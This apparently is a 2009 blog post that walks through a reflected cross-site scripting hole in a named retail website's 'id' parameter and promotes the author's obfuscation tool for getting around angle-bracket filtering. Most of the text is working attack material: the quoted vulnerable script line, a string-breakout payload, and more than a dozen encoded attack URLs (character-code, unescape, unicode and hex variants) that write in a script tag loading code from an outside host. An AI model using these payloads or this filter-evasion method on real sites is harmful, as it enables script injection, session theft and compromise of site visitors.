XSS - Cross-Site Scripting: Injecting Script Tags Without Access to Less Than and Greater Than Characters

Many times an XSS vulnerability allows for injection of JavaScript, but will (seemingly) prohibit XHTML by encoding < and > respectively as < and >. This certainly complicates matters, but with a little effort and obfuscation we can sidestep such preventative measures. To assist in such tasks I created XSS JavaScript Obfuscator (creative name, I know).

Let's take a look at http://www.bestbuy.com/ to see what can be done with such utilities. As always the first thing we need to do is find the vulnerability. A little testing reveals that the id field is vulnerable to JavaScript injection.

http://www.bestbuy.com/site/olspage.jsp?id=testA.,:;\'"<>()[]{}&type=category

And here is the vulnerable line of JavaScript:


ForeCStdSetCookie(triggerParms["oecpp_exitPage"], "testA.,:;\'"()[]{}- page-detail-404-error", null, "/", triggerParms["domain"])

By in injecting ",null,"/",triggerParms["domain"]);var%20x%3Dnew%20Array(" we can turn the vulnerable block of code into this:


ForeCStdSetCookie(triggerParms["oecpp_exitPage"], "",null,"/",triggerParms["domain"]);var x=new Array("- page-detail-404-error", null, "/", triggerParms["domain"]);

At this point we can easily inject JavaScript

http://www.bestbuy.com/site/olspage.jsp?id=",null,"/",triggerParms["domain"]);alert('Hello,%20World!');var%20x%3Dnew%20Array("&type=category

But with less than and greater than characters blocked how can we include an off-site script? This is where the obfuscator comes in. To use it, we're going to have to split our attack into parts.

Url Prefix	http://www.bestbuy.com/site/olspage.jsp?id=
Url Suffix	&type=category
Attack Vector Prefix	",null,"/",triggerParms["domain"]);
Attack Vector Suffix	var x=new Array("
Code	<script type="text/javascript" src="http://xss-javascript-obfuscator.googlecode.com/svn/trunk/XSSJavascriptObfuscator/test.js"></script>

Now that we've got our attack broken up lets populate the fields of XSS JavaScript Obfuscator (embedded at the bottom of this post) and generate some links for http://www.bestbuy.com

String.fromCharCode	http://www.bestbuy.com/site/olspage.jsp?id=",null,"/",triggerParms["domain"]);document.write(String.fromCharCode(60,115,99,114,105,112,116,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,32,115,114,99,61,34,104,116,116,112,58,47,47,120,115,115,45,106,97,118,97,115,99,114,105,112,116,45,111,98,102,117,115,99,97,116,111,114,46,103,111,111,103,108,101,99,111,100,101,46,99,111,109,47,115,118,110,47,116,114,117,110,107,47,88,83,83,74,97,118,97,115,99,114,105,112,116,79,98,102,117,115,99,97,116,111,114,47,116,101,115,116,46,106,115,34,62,60,47,115,99,114,105,112,116,62));var x=new Array("&type=category
String.fromCharCode + Partial Url Encode	http://www.bestbuy.com/site/olspage.jsp?id=%22%2Cnull%2C%22/%22%2CtriggerParms%5B%22domain%22%5D%29%3Bdocument.write%28String.fromCharCode%2860%2C115%2C99%2C114%2C105%2C112%2C116%2C32%2C116%2C121%2C112%2C101%2C61%2C34%2C116%2C101%2C120%2C116%2C47%2C106%2C97%2C118%2C97%2C115%2C99%2C114%2C105%2C112%2C116%2C34%2C32%2C115%2C114%2C99%2C61%2C34%2C104%2C116%2C116%2C112%2C58%2C47%2C47%2C120%2C115%2C115%2C45%2C106%2C97%2C118%2C97%2C115%2C99%2C114%2C105%2C112%2C116%2C45%2C111%2C98%2C102%2C117%2C115%2C99%2C97%2C116%2C111%2C114%2C46%2C103%2C111%2C111%2C103%2C108%2C101%2C99%2C111%2C100%2C101%2C46%2C99%2C111%2C109%2C47%2C115%2C118%2C110%2C47%2C116%2C114%2C117%2C110%2C107%2C47%2C88%2C83%2C83%2C74%2C97%2C118%2C97%2C115%2C99%2C114%2C105%2C112%2C116%2C79%2C98%2C102%2C117%2C115%2C99%2C97%2C116%2C111%2C114%2C47%2C116%2C101%2C115%2C116%2C46%2C106%2C115%2C34%2C62%2C60%2C47%2C115%2C99%2C114%2C105%2C112%2C116%2C62%29%29%3Bvar%20x%3Dnew%20Array%28%22&type=category
String.fromCharCode + Complete Url Encode	http://www.bestbuy.com/site/olspage.jsp?id=%22%2c%6e%75%6c%6c%2c%22%2f%22%2c%74%72%69%67%67%65%72%50%61%72%6d%73%5b%22%64%6f%6d%61%69%6e%22%5d%29%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%36%30%2c%31%31%35%2c%39%39%2c%31%31%34%2c%31%30%35%2c%31%31%32%2c%31%31%36%2c%33%32%2c%31%31%36%2c%31%32%31%2c%31%31%32%2c%31%30%31%2c%36%31%2c%33%34%2c%31%31%36%2c%31%30%31%2c%31%32%30%2c%31%31%36%2c%34%37%2c%31%30%36%2c%39%37%2c%31%31%38%2c%39%37%2c%31%31%35%2c%39%39%2c%31%31%34%2c%31%30%35%2c%31%31%32%2c%31%31%36%2c%33%34%2c%33%32%2c%31%31%35%2c%31%31%34%2c%39%39%2c%36%31%2c%33%34%2c%31%30%34%2c%31%31%36%2c%31%31%36%2c%31%31%32%2c%35%38%2c%34%37%2c%34%37%2c%31%32%30%2c%31%31%35%2c%31%31%35%2c%34%35%2c%31%30%36%2c%39%37%2c%31%31%38%2c%39%37%2c%31%31%35%2c%39%39%2c%31%31%34%2c%31%30%35%2c%31%31%32%2c%31%31%36%2c%34%35%2c%31%31%31%2c%39%38%2c%31%30%32%2c%31%31%37%2c%31%31%35%2c%39%39%2c%39%37%2c%31%31%36%2c%31%31%31%2c%31%31%34%2c%34%36%2c%31%30%33%2c%31%31%31%2c%31%31%31%2c%31%30%33%2c%31%30%38%2c%31%30%31%2c%39%39%2c%31%31%31%2c%31%30%30%2c%31%30%31%2c%34%36%2c%39%39%2c%31%31%31%2c%31%30%39%2c%34%37%2c%31%31%35%2c%31%31%38%2c%31%31%30%2c%34%37%2c%31%31%36%2c%31%31%34%2c%31%31%37%2c%31%31%30%2c%31%30%37%2c%34%37%2c%38%38%2c%38%33%2c%38%33%2c%37%34%2c%39%37%2c%31%31%38%2c%39%37%2c%31%31%35%2c%39%39%2c%31%31%34%2c%31%30%35%2c%31%31%32%2c%31%31%36%2c%37%39%2c%39%38%2c%31%30%32%2c%31%31%37%2c%31%31%35%2c%39%39%2c%39%37%2c%31%31%36%2c%31%31%31%2c%31%31%34%2c%34%37%2c%31%31%36%2c%31%30%31%2c%31%31%35%2c%31%31%36%2c%34%36%2c%31%30%36%2c%31%31%35%2c%33%34%2c%36%32%2c%36%30%2c%34%37%2c%31%31%35%2c%39%39%2c%31%31%34%2c%31%30%35%2c%31%31%32%2c%31%31%36%2c%36%32%29%29%3b%76%61%72%20%78%3d%6e%65%77%20%41%72%72%61%79%28%22&type=category
Unescape Partial Encode	http://www.bestbuy.com/site/olspage.jsp?id=",null,"/",triggerParms["domain"]);document.write(unescape('%3Cscript%20type%3D%22text/javascript%22%20src%3D%22http%3A//xss-javascript-obfuscator.googlecode.com/svn/trunk/XSSJavascriptObfuscator/test.js%22%3E%3C/script%3E'));var x=new Array("&type=category
Unescape Partial Encode + Partial Url Encode	http://www.bestbuy.com/site/olspage.jsp?id=%22%2Cnull%2C%22/%22%2CtriggerParms%5B%22domain%22%5D%29%3Bdocument.write%28unescape%28%27%253Cscript%2520type%253D%2522text/javascript%2522%2520src%253D%2522http%253A//xss-javascript-obfuscator.googlecode.com/svn/trunk/XSSJavascriptObfuscator/test.js%2522%253E%253C/script%253E%27%29%29%3Bvar%20x%3Dnew%20Array%28%22&type=category
Unescape Partial Encode + Full Url Encode	http://www.bestbuy.com/site/olspage.jsp?id=%22%2c%6e%75%6c%6c%2c%22%2f%22%2c%74%72%69%67%67%65%72%50%61%72%6d%73%5b%22%64%6f%6d%61%69%6e%22%5d%29%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%75%6e%65%73%63%61%70%65%28%27%25%33%43%73%63%72%69%70%74%25%32%30%74%79%70%65%25%33%44%25%32%32%74%65%78%74%2f%6a%61%76%61%73%63%72%69%70%74%25%32%32%25%32%30%73%72%63%25%33%44%25%32%32%68%74%74%70%25%33%41%2f%2f%78%73%73%2d%6a%61%76%61%73%63%72%69%70%74%2d%6f%62%66%75%73%63%61%74%6f%72%2e%67%6f%6f%67%6c%65%63%6f%64%65%2e%63%6f%6d%2f%73%76%6e%2f%74%72%75%6e%6b%2f%58%53%53%4a%61%76%61%73%63%72%69%70%74%4f%62%66%75%73%63%61%74%6f%72%2f%74%65%73%74%2e%6a%73%25%32%32%25%33%45%25%33%43%2f%73%63%72%69%70%74%25%33%45%27%29%29%3b%76%61%72%20%78%3d%6e%65%77%20%41%72%72%61%79%28%22&type=category
Unescape Full Encode	http://www.bestbuy.com/site/olspage.jsp?id=",null,"/",triggerParms["domain"]);document.write(unescape('%3c%73%63%72%69%70%74%20%74%79%70%65%3d%22%74%65%78%74%2f%6a%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%78%73%73%2d%6a%61%76%61%73%63%72%69%70%74%2d%6f%62%66%75%73%63%61%74%6f%72%2e%67%6f%6f%67%6c%65%63%6f%64%65%2e%63%6f%6d%2f%73%76%6e%2f%74%72%75%6e%6b%2f%58%53%53%4a%61%76%61%73%63%72%69%70%74%4f%62%66%75%73%63%61%74%6f%72%2f%74%65%73%74%2e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e'));var x=new Array("&type=category
Unescape Full Encode + Partial Url Encode	http://www.bestbuy.com/site/olspage.jsp?id=%22%2Cnull%2C%22/%22%2CtriggerParms%5B%22domain%22%5D%29%3Bdocument.write%28unescape%28%27%253c%2573%2563%2572%2569%2570%2574%2520%2574%2579%2570%2565%253d%2522%2574%2565%2578%2574%252f%256a%2561%2576%2561%2573%2563%2572%2569%2570%2574%2522%2520%2573%2572%2563%253d%2522%2568%2574%2574%2570%253a%252f%252f%2578%2573%2573%252d%256a%2561%2576%2561%2573%2563%2572%2569%2570%2574%252d%256f%2562%2566%2575%2573%2563%2561%2574%256f%2572%252e%2567%256f%256f%2567%256c%2565%2563%256f%2564%2565%252e%2563%256f%256d%252f%2573%2576%256e%252f%2574%2572%2575%256e%256b%252f%2558%2553%2553%254a%2561%2576%2561%2573%2563%2572%2569%2570%2574%254f%2562%2566%2575%2573%2563%2561%2574%256f%2572%252f%2574%2565%2573%2574%252e%256a%2573%2522%253e%253c%252f%2573%2563%2572%2569%2570%2574%253e%27%29%29%3Bvar%20x%3Dnew%20Array%28%22&type=category
Unescape Full Encode + Full Url Encode	http://www.bestbuy.com/site/olspage.jsp?id=%22%2c%6e%75%6c%6c%2c%22%2f%22%2c%74%72%69%67%67%65%72%50%61%72%6d%73%5b%22%64%6f%6d%61%69%6e%22%5d%29%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%75%6e%65%73%63%61%70%65%28%27%25%33%63%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%32%30%25%37%34%25%37%39%25%37%30%25%36%35%25%33%64%25%32%32%25%37%34%25%36%35%25%37%38%25%37%34%25%32%66%25%36%61%25%36%31%25%37%36%25%36%31%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%32%32%25%32%30%25%37%33%25%37%32%25%36%33%25%33%64%25%32%32%25%36%38%25%37%34%25%37%34%25%37%30%25%33%61%25%32%66%25%32%66%25%37%38%25%37%33%25%37%33%25%32%64%25%36%61%25%36%31%25%37%36%25%36%31%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%32%64%25%36%66%25%36%32%25%36%36%25%37%35%25%37%33%25%36%33%25%36%31%25%37%34%25%36%66%25%37%32%25%32%65%25%36%37%25%36%66%25%36%66%25%36%37%25%36%63%25%36%35%25%36%33%25%36%66%25%36%34%25%36%35%25%32%65%25%36%33%25%36%66%25%36%64%25%32%66%25%37%33%25%37%36%25%36%65%25%32%66%25%37%34%25%37%32%25%37%35%25%36%65%25%36%62%25%32%66%25%35%38%25%35%33%25%35%33%25%34%61%25%36%31%25%37%36%25%36%31%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%34%66%25%36%32%25%36%36%25%37%35%25%37%33%25%36%33%25%36%31%25%37%34%25%36%66%25%37%32%25%32%66%25%37%34%25%36%35%25%37%33%25%37%34%25%32%65%25%36%61%25%37%33%25%32%32%25%33%65%25%33%63%25%32%66%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%65%27%29%29%3b%76%61%72%20%78%3d%6e%65%77%20%41%72%72%61%79%28%22&type=category
Unescape Unicode	http://www.bestbuy.com/site/olspage.jsp?id=",null,"/",triggerParms["domain"]);document.write(unescape('%u003c%u0073%u0063%u0072%u0069%u0070%u0074%u0020%u0074%u0079%u0070%u0065%u003d%u0022%u0074%u0065%u0078%u0074%u002f%u006a%u0061%u0076%u0061%u0073%u0063%u0072%u0069%u0070%u0074%u0022%u0020%u0073%u0072%u0063%u003d%u0022%u0068%u0074%u0074%u0070%u003a%u002f%u002f%u0078%u0073%u0073%u002d%u006a%u0061%u0076%u0061%u0073%u0063%u0072%u0069%u0070%u0074%u002d%u006f%u0062%u0066%u0075%u0073%u0063%u0061%u0074%u006f%u0072%u002e%u0067%u006f%u006f%u0067%u006c%u0065%u0063%u006f%u0064%u0065%u002e%u0063%u006f%u006d%u002f%u0073%u0076%u006e%u002f%u0074%u0072%u0075%u006e%u006b%u002f%u0058%u0053%u0053%u004a%u0061%u0076%u0061%u0073%u0063%u0072%u0069%u0070%u0074%u004f%u0062%u0066%u0075%u0073%u0063%u0061%u0074%u006f%u0072%u002f%u0074%u0065%u0073%u0074%u002e%u006a%u0073%u0022%u003e%u003c%u002f%u0073%u0063%u0072%u0069%u0070%u0074%u003e'));var x=new Array("&type=category
Unescape Unicode + Partial Url Encode	http://www.bestbuy.com/site/olspage.jsp?id=%22%2Cnull%2C%22/%22%2CtriggerParms%5B%22domain%22%5D%29%3Bdocument.write%28unescape%28%27%25u003c%25u0073%25u0063%25u0072%25u0069%25u0070%25u0074%25u0020%25u0074%25u0079%25u0070%25u0065%25u003d%25u0022%25u0074%25u0065%25u0078%25u0074%25u002f%25u006a%25u0061%25u0076%25u0061%25u0073%25u0063%25u0072%25u0069%25u0070%25u0074%25u0022%25u0020%25u0073%25u0072%25u0063%25u003d%25u0022%25u0068%25u0074%25u0074%25u0070%25u003a%25u002f%25u002f%25u0078%25u0073%25u0073%25u002d%25u006a%25u0061%25u0076%25u0061%25u0073%25u0063%25u0072%25u0069%25u0070%25u0074%25u002d%25u006f%25u0062%25u0066%25u0075%25u0073%25u0063%25u0061%25u0074%25u006f%25u0072%25u002e%25u0067%25u006f%25u006f%25u0067%25u006c%25u0065%25u0063%25u006f%25u0064%25u0065%25u002e%25u0063%25u006f%25u006d%25u002f%25u0073%25u0076%25u006e%25u002f%25u0074%25u0072%25u0075%25u006e%25u006b%25u002f%25u0058%25u0053%25u0053%25u004a%25u0061%25u0076%25u0061%25u0073%25u0063%25u0072%25u0069%25u0070%25u0074%25u004f%25u0062%25u0066%25u0075%25u0073%25u0063%25u0061%25u0074%25u006f%25u0072%25u002f%25u0074%25u0065%25u0073%25u0074%25u002e%25u006a%25u0073%25u0022%25u003e%25u003c%25u002f%25u0073%25u0063%25u0072%25u0069%25u0070%25u0074%25u003e%27%29%29%3Bvar%20x%3Dnew%20Array%28%22&type=category
Unescape Unicode + Full Url Encode	http://www.bestbuy.com/site/olspage.jsp?id=%22%2c%6e%75%6c%6c%2c%22%2f%22%2c%74%72%69%67%67%65%72%50%61%72%6d%73%5b%22%64%6f%6d%61%69%6e%22%5d%29%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%75%6e%65%73%63%61%70%65%28%27%25%75%30%30%33%63%25%75%30%30%37%33%25%75%30%30%36%33%25%75%30%30%37%32%25%75%30%30%36%39%25%75%30%30%37%30%25%75%30%30%37%34%25%75%30%30%32%30%25%75%30%30%37%34%25%75%30%30%37%39%25%75%30%30%37%30%25%75%30%30%36%35%25%75%30%30%33%64%25%75%30%30%32%32%25%75%30%30%37%34%25%75%30%30%36%35%25%75%30%30%37%38%25%75%30%30%37%34%25%75%30%30%32%66%25%75%30%30%36%61%25%75%30%30%36%31%25%75%30%30%37%36%25%75%30%30%36%31%25%75%30%30%37%33%25%75%30%30%36%33%25%75%30%30%37%32%25%75%30%30%36%39%25%75%30%30%37%30%25%75%30%30%37%34%25%75%30%30%32%32%25%75%30%30%32%30%25%75%30%30%37%33%25%75%30%30%37%32%25%75%30%30%36%33%25%75%30%30%33%64%25%75%30%30%32%32%25%75%30%30%36%38%25%75%30%30%37%34%25%75%30%30%37%34%25%75%30%30%37%30%25%75%30%30%33%61%25%75%30%30%32%66%25%75%30%30%32%66%25%75%30%30%37%38%25%75%30%30%37%33%25%75%30%30%37%33%25%75%30%30%32%64%25%75%30%30%36%61%25%75%30%30%36%31%25%75%30%30%37%36%25%75%30%30%36%31%25%75%30%30%37%33%25%75%30%30%36%33%25%75%30%30%37%32%25%75%30%30%36%39%25%75%30%30%37%30%25%75%30%30%37%34%25%75%30%30%32%64%25%75%30%30%36%66%25%75%30%30%36%32%25%75%30%30%36%36%25%75%30%30%37%35%25%75%30%30%37%33%25%75%30%30%36%33%25%75%30%30%36%31%25%75%30%30%37%34%25%75%30%30%36%66%25%75%30%30%37%32%25%75%30%30%32%65%25%75%30%30%36%37%25%75%30%30%36%66%25%75%30%30%36%66%25%75%30%30%36%37%25%75%30%30%36%63%25%75%30%30%36%35%25%75%30%30%36%33%25%75%30%30%36%66%25%75%30%30%36%34%25%75%30%30%36%35%25%75%30%30%32%65%25%75%30%30%36%33%25%75%30%30%36%66%25%75%30%30%36%64%25%75%30%30%32%66%25%75%30%30%37%33%25%75%30%30%37%36%25%75%30%30%36%65%25%75%30%30%32%66%25%75%30%30%37%34%25%75%30%30%37%32%25%75%30%30%37%35%25%75%30%30%36%65%25%75%30%30%36%62%25%75%30%30%32%66%25%75%30%30%35%38%25%75%30%30%35%33%25%75%30%30%35%33%25%75%30%30%34%61%25%75%30%30%36%31%25%75%30%30%37%36%25%75%30%30%36%31%25%75%30%30%37%33%25%75%30%30%36%33%25%75%30%30%37%32%25%75%30%30%36%39%25%75%30%30%37%30%25%75%30%30%37%34%25%75%30%30%34%66%25%75%30%30%36%32%25%75%30%30%36%36%25%75%30%30%37%35%25%75%30%30%37%33%25%75%30%30%36%33%25%75%30%30%36%31%25%75%30%30%37%34%25%75%30%30%36%66%25%75%30%30%37%32%25%75%30%30%32%66%25%75%30%30%37%34%25%75%30%30%36%35%25%75%30%30%37%33%25%75%30%30%37%34%25%75%30%30%32%65%25%75%30%30%36%61%25%75%30%30%37%33%25%75%30%30%32%32%25%75%30%30%33%65%25%75%30%30%33%63%25%75%30%30%32%66%25%75%30%30%37%33%25%75%30%30%36%33%25%75%30%30%37%32%25%75%30%30%36%39%25%75%30%30%37%30%25%75%30%30%37%34%25%75%30%30%33%65%27%29%29%3b%76%61%72%20%78%3d%6e%65%77%20%41%72%72%61%79%28%22&type=category
Hex String	http://www.bestbuy.com/site/olspage.jsp?id=",null,"/",triggerParms["domain"]);document.write('\x3c\x73\x63\x72\x69\x70\x74\x20\x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x20\x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x78\x73\x73\x2d\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x2d\x6f\x62\x66\x75\x73\x63\x61\x74\x6f\x72\x2e\x67\x6f\x6f\x67\x6c\x65\x63\x6f\x64\x65\x2e\x63\x6f\x6d\x2f\x73\x76\x6e\x2f\x74\x72\x75\x6e\x6b\x2f\x58\x53\x53\x4a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x4f\x62\x66\x75\x73\x63\x61\x74\x6f\x72\x2f\x74\x65\x73\x74\x2e\x6a\x73\x22\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e');var x=new Array("&type=category
Hext String + Partial Url Encode	http://www.bestbuy.com/site/olspage.jsp?id=%22%2Cnull%2C%22/%22%2CtriggerParms%5B%22domain%22%5D%29%3Bdocument.write%28%27%5Cx3c%5Cx73%5Cx63%5Cx72%5Cx69%5Cx70%5Cx74%5Cx20%5Cx74%5Cx79%5Cx70%5Cx65%5Cx3d%5Cx22%5Cx74%5Cx65%5Cx78%5Cx74%5Cx2f%5Cx6a%5Cx61%5Cx76%5Cx61%5Cx73%5Cx63%5Cx72%5Cx69%5Cx70%5Cx74%5Cx22%5Cx20%5Cx73%5Cx72%5Cx63%5Cx3d%5Cx22%5Cx68%5Cx74%5Cx74%5Cx70%5Cx3a%5Cx2f%5Cx2f%5Cx78%5Cx73%5Cx73%5Cx2d%5Cx6a%5Cx61%5Cx76%5Cx61%5Cx73%5Cx63%5Cx72%5Cx69%5Cx70%5Cx74%5Cx2d%5Cx6f%5Cx62%5Cx66%5Cx75%5Cx73%5Cx63%5Cx61%5Cx74%5Cx6f%5Cx72%5Cx2e%5Cx67%5Cx6f%5Cx6f%5Cx67%5Cx6c%5Cx65%5Cx63%5Cx6f%5Cx64%5Cx65%5Cx2e%5Cx63%5Cx6f%5Cx6d%5Cx2f%5Cx73%5Cx76%5Cx6e%5Cx2f%5Cx74%5Cx72%5Cx75%5Cx6e%5Cx6b%5Cx2f%5Cx58%5Cx53%5Cx53%5Cx4a%5Cx61%5Cx76%5Cx61%5Cx73%5Cx63%5Cx72%5Cx69%5Cx70%5Cx74%5Cx4f%5Cx62%5Cx66%5Cx75%5Cx73%5Cx63%5Cx61%5Cx74%5Cx6f%5Cx72%5Cx2f%5Cx74%5Cx65%5Cx73%5Cx74%5Cx2e%5Cx6a%5Cx73%5Cx22%5Cx3e%5Cx3c%5Cx2f%5Cx73%5Cx63%5Cx72%5Cx69%5Cx70%5Cx74%5Cx3e%27%29%3Bvar%20x%3Dnew%20Array%28%22&type=category
Hex String + Full Url Encode	http://www.bestbuy.com/site/olspage.jsp?id=%22%2c%6e%75%6c%6c%2c%22%2f%22%2c%74%72%69%67%67%65%72%50%61%72%6d%73%5b%22%64%6f%6d%61%69%6e%22%5d%29%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%5c%78%33%63%5c%78%37%33%5c%78%36%33%5c%78%37%32%5c%78%36%39%5c%78%37%30%5c%78%37%34%5c%78%32%30%5c%78%37%34%5c%78%37%39%5c%78%37%30%5c%78%36%35%5c%78%33%64%5c%78%32%32%5c%78%37%34%5c%78%36%35%5c%78%37%38%5c%78%37%34%5c%78%32%66%5c%78%36%61%5c%78%36%31%5c%78%37%36%5c%78%36%31%5c%78%37%33%5c%78%36%33%5c%78%37%32%5c%78%36%39%5c%78%37%30%5c%78%37%34%5c%78%32%32%5c%78%32%30%5c%78%37%33%5c%78%37%32%5c%78%36%33%5c%78%33%64%5c%78%32%32%5c%78%36%38%5c%78%37%34%5c%78%37%34%5c%78%37%30%5c%78%33%61%5c%78%32%66%5c%78%32%66%5c%78%37%38%5c%78%37%33%5c%78%37%33%5c%78%32%64%5c%78%36%61%5c%78%36%31%5c%78%37%36%5c%78%36%31%5c%78%37%33%5c%78%36%33%5c%78%37%32%5c%78%36%39%5c%78%37%30%5c%78%37%34%5c%78%32%64%5c%78%36%66%5c%78%36%32%5c%78%36%36%5c%78%37%35%5c%78%37%33%5c%78%36%33%5c%78%36%31%5c%78%37%34%5c%78%36%66%5c%78%37%32%5c%78%32%65%5c%78%36%37%5c%78%36%66%5c%78%36%66%5c%78%36%37%5c%78%36%63%5c%78%36%35%5c%78%36%33%5c%78%36%66%5c%78%36%34%5c%78%36%35%5c%78%32%65%5c%78%36%33%5c%78%36%66%5c%78%36%64%5c%78%32%66%5c%78%37%33%5c%78%37%36%5c%78%36%65%5c%78%32%66%5c%78%37%34%5c%78%37%32%5c%78%37%35%5c%78%36%65%5c%78%36%62%5c%78%32%66%5c%78%35%38%5c%78%35%33%5c%78%35%33%5c%78%34%61%5c%78%36%31%5c%78%37%36%5c%78%36%31%5c%78%37%33%5c%78%36%33%5c%78%37%32%5c%78%36%39%5c%78%37%30%5c%78%37%34%5c%78%34%66%5c%78%36%32%5c%78%36%36%5c%78%37%35%5c%78%37%33%5c%78%36%33%5c%78%36%31%5c%78%37%34%5c%78%36%66%5c%78%37%32%5c%78%32%66%5c%78%37%34%5c%78%36%35%5c%78%37%33%5c%78%37%34%5c%78%32%65%5c%78%36%61%5c%78%37%33%5c%78%32%32%5c%78%33%65%5c%78%33%63%5c%78%32%66%5c%78%37%33%5c%78%36%33%5c%78%37%32%5c%78%36%39%5c%78%37%30%5c%78%37%34%5c%78%33%65%27%29%3b%76%61%72%20%78%3d%6e%65%77%20%41%72%72%61%79%28%22&type=category

And here we are with several links containing obfuscated JavaScript that will inject a script tag. Testing should reveal which links work best; generally the obfuscation methods ending with a partial URL encode are the most compatible.

XSS JavaScript Obfuscator

Url Prefix	Url Suffix
Attack Vector Prefix	Attack Vector Suffix
Code	Encoded Javascript
Partial Url Encode	Complete Url Encode
Decode Method String.fromCharCode call unescape partial encode call unescape full encode call unescape full unicode encode call hex string	Decode Return Call document.write eval

XSS - Cross-Site Scripting

Friday, May 8, 2009

Injecting Script Tags Without Access to Less Than and Greater Than Characters - Bestbuy.com

XSS JavaScript Obfuscator

No comments:

Post a Comment

About Me

Blog Archive

Blog Catalog

Blogflux

Blogged

Blogville